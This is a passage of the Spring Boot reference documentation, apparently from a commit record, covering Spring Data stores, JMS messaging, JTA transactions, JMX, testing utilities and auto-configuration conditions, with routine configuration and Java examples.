mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`'\nfor collecting the dependencies in a convenient way. There is currently no auto=config\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elastic Search] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: if you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can chose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-template]]\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\n(new in Spring 4.1) can be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a default\none is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) { ... }\n\n\t}\n----\n\nCheck {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the javadoc of `@EnableJms`]\nfor more details.\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomkos] or\nhttp:\/\/docs.codehaus.org\/display\/BTM\/Home[Bitronix] embedded transaction manager. JTA\ntransactions are also supported when deploying to a suitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to manage\ntransactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to support\nXA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring Beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` folder in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceIml`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` javadoc]\nfor complete details.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Birtronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` folder in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the http:\/\/btm.codehaus.org\/api\/2.0.1\/bitronix\/tm\/Configuration.html[Bitronix\ndocumentation] for details.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application servers built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* Junit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For Example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Condition` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows configuration\nto be skipped based on the presence or absence of specific classes. Due to the fact that\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the 